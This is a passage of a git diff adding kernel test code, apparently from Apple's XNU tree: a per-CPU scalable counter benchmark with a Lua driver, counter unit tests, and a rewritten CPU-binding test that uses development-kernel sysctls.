int ret = sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0); + if (ret == -1) { + fprintf(stderr, "failed to query hw.ncpu\n"); + exit(1); + } + return ncpu; +} diff --git a/tests/benchmark/helpers.h b/tests/benchmark/helpers.h new file mode 100644 index 000000000..12746bcd2 --- /dev/null +++ b/tests/benchmark/helpers.h @@ -0,0 +1,38 @@ +#ifndef BENCHMARK_PERF_HELPERS_H +#define BENCHMARK_PERF_HELPERS_H + +/* + * Utility functions and constants used by perf tests. + */ +#include +#include +#include + +/* + * mmap an anonymous chunk of memory. + */ +unsigned char *mmap_buffer(size_t size); +/* + * Returns a - b in microseconds. + * NB: a must be >= b + */ +uint64_t timespec_difference_us(const struct timespec* a, const struct timespec* b); +/* + * Print the message to stdout along with the current time. + * Also flushes stdout so that the log can help detect hangs. Don't call + * this function from within the measured portion of the benchmark as it will + * pollute your measurement. + * + * NB: Will only log if verbose == true. + */ +void benchmark_log(bool verbose, const char *restrict fmt, ...) __attribute__((format(printf, 2, 3))); + +static const uint64_t kNumMicrosecondsInSecond = 1000UL * 1000; +static const uint64_t kNumNanosecondsInMicrosecond = 1000UL; +static const uint64_t kNumNanosecondsInSecond = kNumNanosecondsInMicrosecond * kNumMicrosecondsInSecond; +/* Get a CLOCK_MONOTONIC_RAW timestamp in nanoseconds (expands to an expression, no trailing ';') */ +#define current_timestamp_ns() (clock_gettime_nsec_np(CLOCK_MONOTONIC_RAW)) + +int get_ncpu(void); + +#endif /* !defined(BENCHMARK_PERF_HELPERS_H) */ diff --git a/tests/counter/benchmark.c b/tests/counter/benchmark.c new file mode 100644 index 000000000..32471d304 --- /dev/null +++ b/tests/counter/benchmark.c @@ -0,0 +1,243 @@ +/* Per-cpu counter microbenchmarks.
*/ + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "benchmark/helpers.h" +#include "counter/common.h" + +typedef enum test_variant { + VARIANT_SCALABLE_COUNTER, + VARIANT_ATOMIC, + VARIANT_RACY +} test_variant_t; + +static const char* kScalableCounterArgument = "scalable"; +static const char* kAtomicCounterArgument = "atomic"; +static const char* kRacyCounterArgument = "racy"; + +static const int64_t kChunkSize = 100000000; + +/* Arguments parsed from the command line */ +typedef struct test_args { + size_t n_threads; + unsigned long long num_writes; + test_variant_t variant; + bool verbose; +} test_args_t; + +typedef struct { + char _padding1[128]; + atomic_bool tg_test_start; + atomic_ullong tg_num_writes_remaining; + atomic_ullong tg_threads_ready; + test_args_t tg_args; + uint64_t tg_start_time; + uint64_t tg_end_time; + uint64_t tg_start_value; + uint64_t tg_end_value; + char _padding2[128]; +} test_globals_t; + +static void parse_arguments(int argc, char** argv, test_args_t *args); +static const char *get_sysctl_name_for_test_variant(test_variant_t variant); +static void *writer(void *); +static uint64_t counter_read(test_variant_t); + +int +main(int argc, char** argv) +{ + test_globals_t globals = {0}; + pthread_t* threads = NULL; + int ret; + int is_development_kernel; + size_t is_development_kernel_size = sizeof(is_development_kernel); + pthread_attr_t pthread_attrs; + uint64_t duration, writes_stored; + double writes_per_second; + double loss; + + if (sysctlbyname("kern.development", &is_development_kernel, + &is_development_kernel_size, NULL, 0) != 0 || !is_development_kernel) { + fprintf(stderr, "%s requires the development kernel\n", argv[0]); + exit(1); + } + + parse_arguments(argc, argv, &(globals.tg_args)); + atomic_store(&(globals.tg_num_writes_remaining), globals.tg_args.num_writes); + + threads = malloc(sizeof(pthread_t) * globals.tg_args.n_threads); + assert(threads); + ret = 
pthread_attr_init(&pthread_attrs); + assert(ret == 0); + ret = init_scalable_counter_test(); + assert(ret == 0); + globals.tg_start_value = counter_read(globals.tg_args.variant); + for (size_t i = 0; i < globals.tg_args.n_threads; i++) { + ret = pthread_create(threads + i, &pthread_attrs, writer, &globals); + assert(ret == 0); + } + for (size_t i = 0; i < globals.tg_args.n_threads; i++) { + ret = pthread_join(threads[i], NULL); + assert(ret == 0); + } + ret = fini_scalable_counter_test(); + assert(ret == 0); + globals.tg_end_value = counter_read(globals.tg_args.variant); + + duration = globals.tg_end_time - globals.tg_start_time; + printf("-----Results-----\n"); + printf("rate,loss\n"); + writes_per_second = globals.tg_args.num_writes / ((double) duration / kNumNanosecondsInSecond); + writes_stored = globals.tg_end_value - globals.tg_start_value; + loss = (1.0 - ((double) writes_stored / globals.tg_args.num_writes)) * 100; + printf("%.4f,%.4f\n", writes_per_second, loss); + return 0; +} + +static void * +writer(void *arg) +{ + int ret; + const char* sysctl_name; + test_globals_t *globals = arg; + int64_t value = kChunkSize; + //size_t size = sizeof(value); + + sysctl_name = get_sysctl_name_for_test_variant(globals->tg_args.variant); + assert(sysctl_name != NULL); + + if (atomic_fetch_add(&(globals->tg_threads_ready), 1) == globals->tg_args.n_threads - 1) { + globals->tg_start_time = current_timestamp_ns(); + atomic_store(&globals->tg_test_start, true); + } + while (!atomic_load(&(globals->tg_test_start))) { + ; + } + + while (true) { + unsigned long long remaining = atomic_fetch_sub(&(globals->tg_num_writes_remaining), value); + if (remaining < kChunkSize || remaining > globals->tg_args.num_writes) { + break; + } + + ret = sysctlbyname(sysctl_name, NULL, NULL, &value, sizeof(value)); + assert(ret == 0); + if (remaining == kChunkSize || remaining - kChunkSize > remaining) { + break; + } + } + + if (atomic_fetch_sub(&(globals->tg_threads_ready), 1) == 1) { + 
globals->tg_end_time = current_timestamp_ns(); + } + + return NULL; +} + +static const char* +get_sysctl_name_for_test_variant(test_variant_t variant) +{ + switch (variant) { + case VARIANT_SCALABLE_COUNTER: + return "kern.scalable_counter_write_benchmark"; + case VARIANT_ATOMIC: + return "kern.scalable_counter_atomic_counter_write_benchmark"; + case VARIANT_RACY: + return "kern.scalable_counter_racy_counter_benchmark"; + default: + return NULL; + } +} + +static const char* +get_sysctl_load_name_for_test_variant(test_variant_t variant) +{ + switch (variant) { + case VARIANT_SCALABLE_COUNTER: + return "kern.scalable_counter_test_load"; + case VARIANT_ATOMIC: + return "kern.scalable_counter_atomic_counter_load"; + case VARIANT_RACY: + return "kern.scalable_counter_racy_counter_load"; + default: + return NULL; + } +} + +static uint64_t +counter_read(test_variant_t variant) +{ + const char *sysctl_name = get_sysctl_load_name_for_test_variant(variant); + int result; + uint64_t value; + size_t size = sizeof(value); + result = sysctlbyname(sysctl_name, &value, &size, NULL, 0); + assert(result == 0); + return value; +} + +static void +print_help(char** argv) +{ + fprintf(stderr, "%s: [-v] variant num_writes num_threads\n", argv[0]); + fprintf(stderr, "\ntest variants:\n"); + fprintf(stderr, " %s Benchmark scalable counters.\n", kScalableCounterArgument); + fprintf(stderr, " %s Benchmark single atomic counter.\n", kAtomicCounterArgument); + fprintf(stderr, " %s Benchmark racy counter.\n", kRacyCounterArgument); +} + +static void +parse_arguments(int argc, char** argv, test_args_t *args) +{ + int current_argument = 1; + memset(args, 0, sizeof(test_args_t)); + if (argc < 4 || argc > 6 || (argv[1][0] == '-' && argc < 5)) { /* a leading option needs one more argv slot, else argv[4] is NULL */ + print_help(argv); + exit(1); + } + if (argv[current_argument][0] == '-') { + if (strcmp(argv[current_argument], "-v") == 0) { + args->verbose = true; + } else { + fprintf(stderr, "Unknown argument %s\n", argv[current_argument]); + print_help(argv); + exit(1); + } + current_argument++; + } + if
(strncasecmp(argv[current_argument], kScalableCounterArgument, strlen(kScalableCounterArgument)) == 0) { + args->variant = VARIANT_SCALABLE_COUNTER; + } else if (strncasecmp(argv[current_argument], kAtomicCounterArgument, strlen(kAtomicCounterArgument)) == 0) { + args->variant = VARIANT_ATOMIC; + } else if (strncasecmp(argv[current_argument], kRacyCounterArgument, strlen(kRacyCounterArgument)) == 0) { + args->variant = VARIANT_RACY; + } else { + print_help(argv); + exit(1); + } + current_argument++; + + long num_writes = strtol(argv[current_argument++], NULL, 10); + if (num_writes == 0) { + print_help(argv); + exit(1); + } + long num_cores = strtol(argv[current_argument++], NULL, 10); + if (num_cores == 0) { + print_help(argv); + exit(1); + } + assert(num_cores > 0 && num_cores <= get_ncpu()); + args->n_threads = (unsigned int) num_cores; + args->num_writes = (unsigned long long) num_writes; +} diff --git a/tests/counter/benchmark.lua b/tests/counter/benchmark.lua new file mode 100644 index 000000000..2759e87e5 --- /dev/null +++ b/tests/counter/benchmark.lua @@ -0,0 +1,107 @@ +#!/usr/local/bin/recon +require 'strict' + +local benchrun = require 'benchrun' +local perfdata = require 'perfdata' +local sysctl = require 'sysctl' +local csv = require 'csv' + +local kDefaultNumWrites = 10000000000 + +local benchmark = benchrun.new { + name = 'xnu.per_cpu_counter', + version = 1, + arg = arg, + modify_argparser = function(parser) + parser:argument{ + name = 'path', + description = 'Path to benchmark binary' + } + parser:option{ + name = '--cpu-workers', + description = 'Number of cpu workers' + } + parser:flag{ + name = '--through-max-workers', + description = 'Run benchmark for [1..n] cpu workers' + } + parser:flag{ + name = '--through-max-workers-fast', + description = 'Run benchmark for [1..2] and each power of four value in [4..n] cpu workers' + } + parser:option { + name = "--num-writes", + description = "number of writes", + default = kDefaultNumWrites + } + 
parser:option{ + name = '--variant', + description = 'Which benchmark variant to run (scalable, atomic, or racy)', + default = 'scalable', + choices = {"scalable", "atomic", "racy"} + } + end +} + +assert(benchmark.opt.path, "No path supplied for fault throughput binary") + +local ncpus, err = sysctl('hw.logicalcpu_max') +assert(ncpus > 0, 'invalid number of logical cpus') +local cpu_workers = tonumber(benchmark.opt.cpu_workers) or ncpus + +local writes_per_second = perfdata.unit.custom('writes/sec') +local tests = {} + +function QueueTest(num_cores) + table.insert(tests, { + path = benchmark.opt.path, + num_cores = num_cores, + }) +end + +if benchmark.opt.through_max_workers then + for i = 1, cpu_workers do + QueueTest(i) + end +elseif benchmark.opt.through_max_workers_fast then + local i = 1 + while i <= cpu_workers do + QueueTest(i) + -- Always do a run with two threads to see what the first part of + -- the scaling curve looks like + -- (and to measure perf on dual core systems). + if i == 1 and cpu_workers >= 2 then + QueueTest(i + 1) + end + i = i * 4 + end +else + QueueTest(cpu_workers) +end + +for _, test in ipairs(tests) do + local args = {test.path, benchmark.opt.variant, benchmark.opt.num_writes, test.num_cores, + echo = true} + for out in benchmark:run(args) do + local result = out:match("-----Results-----\n(.*)") + benchmark:assert(result, "Unable to find result data in output") + local data = csv.openstring(result, {header = true}) + for field in data:lines() do + for k, v in pairs(field) do + local unit = writes_per_second + local larger_better = true + if k == "loss" then + unit = percentage + larger_better = false + end + benchmark.writer:add_value(k, unit, tonumber(v), { + [perfdata.larger_better] = larger_better, + threads = test.num_cores, + variant = benchmark.opt.variant + }) + end + end + end +end + +benchmark:finish() diff --git a/tests/counter/common.c b/tests/counter/common.c new file mode 100644 index 000000000..f759f29cc --- /dev/null 
+++ b/tests/counter/common.c @@ -0,0 +1,24 @@ +#include +#include +#include + +#include "counter/common.h" + +int +init_scalable_counter_test() +{ + kern_return_t result; + int value = 1; + + result = sysctlbyname("kern.scalable_counter_test_start", NULL, NULL, &value, sizeof(value)); + return result; +} + +int +fini_scalable_counter_test() +{ + kern_return_t result; + int value = 1; + result = sysctlbyname("kern.scalable_counter_test_finish", NULL, NULL, &value, sizeof(value)); + return result; +} diff --git a/tests/counter/common.h b/tests/counter/common.h new file mode 100644 index 000000000..eaf4daa68 --- /dev/null +++ b/tests/counter/common.h @@ -0,0 +1,7 @@ +#ifndef _COUNTER_COMMON_H +#define _COUNTER_COMMON_H + +int init_scalable_counter_test(void); +int fini_scalable_counter_test(void); + +#endif /* !defined(_COUNTER_COMMON_H) */ diff --git a/tests/counter/counter.c b/tests/counter/counter.c new file mode 100644 index 000000000..8000b0822 --- /dev/null +++ b/tests/counter/counter.c @@ -0,0 +1,181 @@ +#include +#include + +#include +#include + +#include "counter/common.h" +#include "test_utils.h" + +static unsigned int ncpu(void); + +static uint64_t +sysctl_read(const char *name) +{ + int result; + uint64_t value; + size_t size = sizeof(value); + result = sysctlbyname(name, &value, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Read from %s", name); + return value; +} + +static void +sysctl_write(const char* name, int64_t amount) +{ + kern_return_t result; + result = sysctlbyname(name, NULL, NULL, &amount, sizeof(int64_t)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "Write to %s", name); +} + +static void +scalable_counter_add(int64_t amount) +{ + sysctl_write("kern.scalable_counter_test_add", amount); +} + +static void +static_scalable_counter_add(int64_t amount) +{ + sysctl_write("kern.static_scalable_counter_test_add", amount); +} + +static int64_t +scalable_counter_load(void) +{ + return (int64_t) 
sysctl_read("kern.scalable_counter_test_load"); +} + +static int64_t +static_scalable_counter_load(void) +{ + return (int64_t) sysctl_read("kern.static_scalable_counter_test_load"); +} + +/* + * A background thread that bangs on the percpu counter and then exits. + * @param num_iterations How many times to bang on the counter. Each iteration makes the counter + * bigger by 100. + */ +static void* +background_scalable_counter_thread(void* num_iterations_ptr) +{ + int64_t i, num_iterations; + num_iterations = (int64_t)(num_iterations_ptr); + for (i = 0; i < num_iterations; i++) { + scalable_counter_add(-25); + scalable_counter_add(75); + scalable_counter_add(-100); + scalable_counter_add(150); + } + atomic_thread_fence(memory_order_release); + return 0; +} + +static +void +darwin_test_fini_scalable_counter_test() +{ + int ret = fini_scalable_counter_test(); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "fini_scalable_counter_test"); +} + +static +void +darwin_test_setup(void) +{ + T_SETUPBEGIN; + int dev_kernel = is_development_kernel(); + T_QUIET; T_ASSERT_POSIX_SUCCESS(dev_kernel, "sysctlbyname kern.development"); + if (is_development_kernel() != 1) { + T_SKIP("Skipping test on non development kernel."); + } + init_scalable_counter_test(); + T_SETUPEND; + T_ATEND(darwin_test_fini_scalable_counter_test); +} + +T_DECL(test_scalable_counters_single_threaded, "Test single threaded operations on scalable_counters", T_META_ASROOT(true)) +{ + static int64_t kNumIterations = 100, i, expected_value = 0; + darwin_test_setup(); + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "Counter starts at zero"); + + /* Simple add, subtract, and read */ + scalable_counter_add(1); + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 1LL, "0 + 1 == 1"); + scalable_counter_add(-1); + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), 0LL, "1 - 1 == 0"); + for (i = 0; i < kNumIterations; i++) { + scalable_counter_add(i); + expected_value += i; + } + for (i = 0; i < kNumIterations / 2; i++) { + 
scalable_counter_add(-i); + expected_value -= i; + } + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct."); + T_END; +} + +T_DECL(test_static_counter, "Test staticly declared counter", T_META_ASROOT(true)) +{ + static size_t kNumIterations = 100; + int64_t start_value; + darwin_test_setup(); + start_value = static_scalable_counter_load(); + for (size_t i = 0; i < kNumIterations; i++) { + static_scalable_counter_add(1); + } + T_QUIET; T_EXPECT_EQ(static_scalable_counter_load(), (long long) kNumIterations + start_value, "Counter value is correct"); + T_END; +} + +T_DECL(test_scalable_counters_multithreaded, "Test multi-threaded operations on scalable_counters", T_META_ASROOT(true)) +{ + unsigned int kNumThreads = ncpu() * 5; + int ret; + int64_t i; + pthread_attr_t pthread_attr; + pthread_t *threads; + + darwin_test_setup(); + + threads = malloc(sizeof(pthread_t) * kNumThreads); + T_QUIET; T_ASSERT_NOTNULL(threads, "Out of memory"); + + ret = pthread_attr_init(&pthread_attr); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_init"); + + int64_t expected_value = 0; + for (i = 0; i < kNumThreads; i++) { + ret = pthread_create(&threads[i], &pthread_attr, background_scalable_counter_thread, (void*)(i)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create"); + expected_value += 100 * i; + } + + for (i = 0; i < kNumThreads; i++) { + void *exit_code; + ret = pthread_join(threads[i], &exit_code); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_join"); + T_QUIET; T_ASSERT_EQ((ptrdiff_t) exit_code, (ptrdiff_t) 0, "Background thread exited sucessfully."); + } + atomic_thread_fence(memory_order_acquire); + + T_QUIET; T_EXPECT_EQ(scalable_counter_load(), expected_value, "Counter value is correct."); + + ret = pthread_attr_destroy(&pthread_attr); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_attr_destroy"); + free(threads); +} + +static unsigned int +ncpu() +{ + kern_return_t result; + int ncpu; + size_t size = sizeof(ncpu); + result 
= sysctlbyname("hw.ncpu", &ncpu, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(result, "hw.ncpu"); + return (unsigned int) ncpu; +} diff --git a/tests/cpucount.c b/tests/cpucount.c index 24a2c156c..0906ab7fc 100644 --- a/tests/cpucount.c +++ b/tests/cpucount.c @@ -2,284 +2,190 @@ * Test to validate that we can schedule threads on all hw.ncpus cores according to _os_cpu_number * * + * * * xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -g -Weverything * xcrun -sdk iphoneos.internal clang -arch arm64 -o cpucount-ios cpucount.c -ldarwintest -g -Weverything + * xcrun -sdk macosx.internal clang -o cpucount cpucount.c -ldarwintest -arch arm64e -Weverything */ #include #include #include -#include -#include #include -#include #include -#include -#include -#include #include -#include +#include +#include #include #include #include /* private header for _os_cpu_number */ -T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true)); +T_GLOBAL_META( + T_META_RUN_CONCURRENTLY(false), + T_META_BOOTARGS_SET("enable_skstb=1"), + T_META_CHECK_LEAKS(false), + T_META_ASROOT(true), + T_META_ALL_VALID_ARCHS(true) + ); -/* const variables aren't constants, but enums are */ -enum { max_threads = 40 }; +#define KERNEL_BOOTARGS_MAX_SIZE 1024 +static char kernel_bootargs[KERNEL_BOOTARGS_MAX_SIZE]; -#define CACHE_ALIGNED __attribute__((aligned(128))) - -static _Atomic CACHE_ALIGNED uint64_t g_ready_threads = 0; - -static _Atomic CACHE_ALIGNED bool g_cpu_seen[max_threads]; - -static _Atomic CACHE_ALIGNED bool g_bail = false; - -static uint32_t g_threads; /* set by sysctl hw.ncpu */ - -static uint64_t g_spin_ms = 50; /* it takes ~50ms of spinning for CLPC to deign to give us all cores */ - -/* - * sometimes pageout scan can eat all of CPU 0 long enough to fail the test, - * so we run the test at RT priority - */ -static uint32_t g_thread_pri = 97; - -/* - * add in some extra low-pri threads to convince the amp scheduler to use E-cores consistently - * works around - */ -static uint32_t
g_spin_threads = 2; -static uint32_t g_spin_threads_pri = 20; - -static semaphore_t g_readysem, g_go_sem; +#define KERNEL_VERSION_MAX_SIZE 1024 +static char kernel_version[KERNEL_VERSION_MAX_SIZE]; static mach_timebase_info_data_t timebase_info; static uint64_t -nanos_to_abs(uint64_t nanos) +abs_to_nanos(uint64_t abs) { - return nanos * timebase_info.denom / timebase_info.numer; + return abs * timebase_info.numer / timebase_info.denom; } -static void -set_realtime(pthread_t thread) -{ - kern_return_t kr; - thread_time_constraint_policy_data_t pol; - - mach_port_t target_thread = pthread_mach_thread_np(thread); - T_QUIET; T_ASSERT_NOTNULL(target_thread, "pthread_mach_thread_np"); - - /* 1s 100ms 10ms */ - pol.period = (uint32_t)nanos_to_abs(1000000000); - pol.constraint = (uint32_t)nanos_to_abs(100000000); - pol.computation = (uint32_t)nanos_to_abs(10000000); - - pol.preemptible = 0; /* Ignored by OS */ - kr = thread_policy_set(target_thread, THREAD_TIME_CONSTRAINT_POLICY, (thread_policy_t) &pol, - THREAD_TIME_CONSTRAINT_POLICY_COUNT); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_policy_set(THREAD_TIME_CONSTRAINT_POLICY)"); -} - -static pthread_t -create_thread(void *(*start_routine)(void *), uint32_t priority) +static int32_t +get_csw_count() { + struct proc_taskinfo taskinfo; int rv; - pthread_t new_thread; - pthread_attr_t attr; - - struct sched_param param = { .sched_priority = (int)priority }; - - rv = pthread_attr_init(&attr); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_init"); - - rv = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setdetachstate"); - - rv = pthread_attr_setschedparam(&attr, &param); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_setschedparam"); - - rv = pthread_create(&new_thread, &attr, start_routine, NULL); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_create"); - - if (priority == 97) { - set_realtime(new_thread); - } - rv = pthread_attr_destroy(&attr); -
T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_attr_destroy"); + rv = proc_pidinfo(getpid(), PROC_PIDTASKINFO, 0, &taskinfo, sizeof(taskinfo)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "PROC_PIDTASKINFO"); - return new_thread; + return taskinfo.pti_csw; } -static void * -thread_fn(__unused void *arg) +// noinline hopefully keeps the optimizer from hoisting it out of the loop +// until rdar://68253516 is fixed. +__attribute__((noinline)) +static uint32_t +fixed_os_cpu_number(void) { - T_QUIET; T_EXPECT_TRUE(true, "initialize darwintest on this thread"); - - kern_return_t kr; - - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + uint32_t cpu_number = _os_cpu_number(); - /* atomic inc to say hello */ - g_ready_threads++; + return cpu_number; +} - uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time(); - /* - * spin to force the other threads to spread out across the cores - * may take some time if cores are masked and CLPC needs to warm up to unmask them - */ - while (g_ready_threads < g_threads && mach_absolute_time() < timeout) { - ; - } +T_DECL(count_cpus, "Tests we can schedule bound threads on all hw.ncpus cores and that _os_cpu_number matches") +{ + int rv; - T_QUIET; T_ASSERT_GE(timeout, mach_absolute_time(), "waiting for all threads took too long"); + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); - timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time(); + /* Validate what kind of kernel we're on */ + size_t kernel_version_size = sizeof(kernel_version); + rv = sysctlbyname("kern.version", kernel_version, &kernel_version_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.version"); - int iteration = 0; - uint32_t cpunum = 0; + T_LOG("kern.version: %s\n", kernel_version); - /* search for new CPUs for the duration */ - while (mach_absolute_time() < timeout) { - cpunum = _os_cpu_number(); + /* Double check that darwintest set the 
boot arg we requested */ + size_t kernel_bootargs_size = sizeof(kernel_bootargs); + rv = sysctlbyname("kern.bootargs", kernel_bootargs, &kernel_bootargs_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.bootargs"); - assert(cpunum < max_threads); + T_LOG("kern.bootargs: %s\n", kernel_bootargs); - g_cpu_seen[cpunum] = true; + if (NULL == strstr(kernel_bootargs, "enable_skstb=1")) { + T_FAIL("enable_skstb=1 boot-arg is missing"); + } - if (iteration++ % 10000) { - uint32_t cpus_seen = 0; + kern_return_t kr; + kr = mach_timebase_info(&timebase_info); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info"); - for (uint32_t i = 0; i < g_threads; i++) { - if (g_cpu_seen[i]) { - cpus_seen++; - } - } + int bound_cpu_out = 0; + size_t bound_cpu_out_size = sizeof(bound_cpu_out); + rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0); - /* bail out early if we saw all CPUs */ - if (cpus_seen == g_threads) { - break; - } + if (rv == -1) { + if (errno == ENOENT) { + T_FAIL("kern.sched_thread_bind_cpu doesn't exist, must set enable_skstb=1 boot-arg on development kernel"); + } + if (errno == EPERM) { + T_FAIL("must run as root"); } } - g_bail = true; + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu"); + T_QUIET; T_ASSERT_EQ(bound_cpu_out, -1, "kern.sched_thread_bind_cpu should exist, start unbound"); - printf("thread cpunum: %d\n", cpunum); + struct sched_param param = {.sched_priority = 63}; - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + rv = pthread_setschedparam(pthread_self(), SCHED_FIFO, &param); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "pthread_setschedparam"); - return NULL; -} + uint32_t sysctl_ncpu = 0; + size_t ncpu_size = sizeof(sysctl_ncpu); + rv = sysctlbyname("hw.ncpu", &sysctl_ncpu, &ncpu_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)"); -static void * -spin_fn(__unused void *arg) -{ - T_QUIET;
T_EXPECT_TRUE(true, "initialize darwintest on this thread"); + T_LOG("hw.ncpu: %2d\n", sysctl_ncpu); - kern_return_t kr; + T_ASSERT_GT(sysctl_ncpu, 0, "at least one CPU exists"); - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + for (uint32_t cpu_to_bind = 0; cpu_to_bind < sysctl_ncpu; cpu_to_bind++) { + int32_t before_csw_count = get_csw_count(); + T_LOG("(csw %4d) attempting to bind to cpu %2d\n", before_csw_count, cpu_to_bind); - uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC * 2) + mach_absolute_time(); + uint64_t start = mach_absolute_time(); - /* - * run and sleep a bit to force some scheduler churn to get all the cores active - * needed to work around bugs in the amp scheduler - */ - while (mach_absolute_time() < timeout && g_bail == false) { - usleep(500); + rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &cpu_to_bind, sizeof(cpu_to_bind)); - uint64_t inner_timeout = nanos_to_abs(1 * NSEC_PER_MSEC) + mach_absolute_time(); + uint64_t end = mach_absolute_time(); - while (mach_absolute_time() < inner_timeout && g_bail == false) { - ; + if (rv == -1 && errno == ENOTSUP) { + T_SKIP("Binding is available, but this process doesn't support binding (e.g. 
Rosetta on Aruba)"); } - } - kr = semaphore_wait_signal(g_go_sem, g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait_signal"); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", cpu_to_bind); - return NULL; -} + uint32_t os_cpu_number_reported = fixed_os_cpu_number(); + bound_cpu_out = 0; + rv = sysctlbyname("kern.sched_thread_bind_cpu", &bound_cpu_out, &bound_cpu_out_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "read kern.sched_thread_bind_cpu"); -#pragma clang diagnostic push -#pragma clang diagnostic ignored "-Wgnu-flexible-array-initializer" -T_DECL(count_cpus, "Tests we can schedule threads on all hw.ncpus cores according to _os_cpu_number", - T_META_CHECK_LEAKS(false), T_META_ENABLED(false)) -#pragma clang diagnostic pop -{ - setvbuf(stdout, NULL, _IONBF, 0); - setvbuf(stderr, NULL, _IONBF, 0); + T_QUIET; T_EXPECT_EQ((int)cpu_to_bind, bound_cpu_out, + "should report bound cpu id matching requested bind target"); - int rv; - kern_return_t kr; - kr = mach_timebase_info(&timebase_info); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_timebase_info"); - - kr = semaphore_create(mach_task_self(), &g_readysem, SYNC_POLICY_FIFO, 0); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create"); - - kr = semaphore_create(mach_task_self(), &g_go_sem, SYNC_POLICY_FIFO, 0); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_create"); - - size_t ncpu_size = sizeof(g_threads); - rv = sysctlbyname("hw.ncpu", &g_threads, &ncpu_size, NULL, 0); - T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "sysctlbyname(hw.ncpu)"); - - printf("hw.ncpu: %2d\n", g_threads); + uint64_t delta_abs = end - start; + uint64_t delta_ns = abs_to_nanos(delta_abs); - assert(g_threads < max_threads); + int32_t after_csw_count = get_csw_count(); - for (uint32_t i = 0; i < g_threads; i++) { - create_thread(&thread_fn, g_thread_pri); - } - - for (uint32_t i = 0; i < g_spin_threads; i++) { - create_thread(&spin_fn, g_spin_threads_pri); - } + T_LOG("(csw %4d) bound to cpu %2d in %f 
milliseconds\n", + after_csw_count, cpu_to_bind, + ((double)delta_ns / 1000000.0)); - for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) { - kr = semaphore_wait(g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait"); - } + if (cpu_to_bind > 0) { + T_QUIET; T_EXPECT_LT(before_csw_count, after_csw_count, + "should have had to context switch to execute the bind"); + } - uint64_t timeout = nanos_to_abs(g_spin_ms * NSEC_PER_MSEC) + mach_absolute_time(); + T_LOG("cpu %2d reported id %2d\n", + cpu_to_bind, os_cpu_number_reported); - /* spin to warm up CLPC :) */ - while (mach_absolute_time() < timeout) { - ; + T_QUIET; + T_EXPECT_EQ(cpu_to_bind, os_cpu_number_reported, + "should report same CPU number as was bound to"); } - kr = semaphore_signal_all(g_go_sem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_signal_all"); + int unbind = -1; /* pass -1 in order to unbind the thread */ - for (uint32_t i = 0; i < g_threads + g_spin_threads; i++) { - kr = semaphore_wait(g_readysem); - T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "semaphore_wait"); - } + rv = sysctlbyname("kern.sched_thread_bind_cpu", NULL, 0, &unbind, sizeof(unbind)); - uint32_t cpus_seen = 0; + T_QUIET; T_ASSERT_POSIX_SUCCESS(rv, "kern.sched_thread_bind_cpu(%u)", unbind); - for (uint32_t i = 0; i < g_threads; i++) { - if (g_cpu_seen[i]) { - cpus_seen++; - } + rv = sysctlbyname("kern.sched_thread_bind_cpu", 